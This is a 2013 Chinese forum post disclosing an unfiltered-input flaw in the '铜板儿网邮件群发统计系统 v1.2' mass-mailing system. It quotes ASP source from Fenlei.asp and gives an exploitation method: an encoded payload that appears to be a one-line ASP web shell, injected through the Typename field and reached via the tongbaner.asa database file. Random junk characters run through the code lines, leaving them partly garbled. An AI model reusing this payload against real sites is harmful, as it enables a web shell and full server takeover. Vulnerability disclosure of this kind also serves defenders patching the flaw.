找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1853|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp - z, F# R) d& n# L$ o  V2 |1 F- n

: q9 _+ |0 U& \/ \IF Request.QueryString("Action")="del" Then
* P9 F" v$ x4 X5 B! Q, N# Q; O" TID=Request.QueryString("ID")
) k8 x0 b) l1 `% f6 LIF Countss ("tui","Fenlei",ID )<>0 then
4 J& T3 J0 \8 M8 P9 ]* H/ M) C0 ~2 A'略
( U: u6 S) @, f4 P0 f% O" m# MIF Request.QueryString("Action")="Add" Then ' l. U# b+ o& G! ~9 g
Tname=Request.Form("Typename") $ g' F% X: W, M
Set Rs=Server.CreateObject("adodb.Recordset")
* T% E: Z$ U; U/ D. p/ |. wSql="Select * From Fenlei Order by id Desc " * g6 u! ^7 x3 R& t0 V. ?
Rs.Open Sql,Conn,1,3
7 d6 p$ Q: ~+ e3 ]Rs.Addnew 7 B. v- u" H5 M9 L. |% ]
Rs("Typename")=Tname # D2 q) o  ]. a& l" e- {- C7 k
'略
. }  U' C+ J/ m6 z. PSet Rs=Server.CreateObject("adodb.Recordset") 3 `4 ~! V/ P' _7 O! z( J8 d0 T
Sql="Select * From Fenlei Order by id Desc " ! p( W7 M; {7 e- h, t( O1 `. K
Rs.Open Sql,Conn,1,1
6 W5 G. w! L9 D6 Z1 Y'略
; U3 A; t; h  ?9 l3 @%>
9 z  ^3 F& h- i8 ~6 {3 [
* ~' ?1 _6 s, C( T + q2 H# L, d/ e9 L- F

5 d0 C4 l. Z' a8 l! `" [/ |3 d( m没有过滤,直接写入数据库。
, h+ V- F( K2 Q2 ?# k. w# b 0 ]& }% t& K3 j# r0 s
利用方法:& e- V& E$ D" {: C- _7 F7 k

* B# t+ j# K0 T+ F0 D1 f插入:┼攠數畣整爠煥敵瑳∨≡┩>
3 D5 c4 s8 w4 [  h5 z3 y ( d0 B, B) u1 N! F* w$ [

8 p5 P$ J; E' U. c! P& ~9 c连接: http://www.xxx.com/###tongbaner.asa : Y: Q7 Y- }9 Q; K% C  O
'默认安装文件: . g# p' g3 ^5 }+ K; W
'install.asp; Q, U( C0 X/ c) }  `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表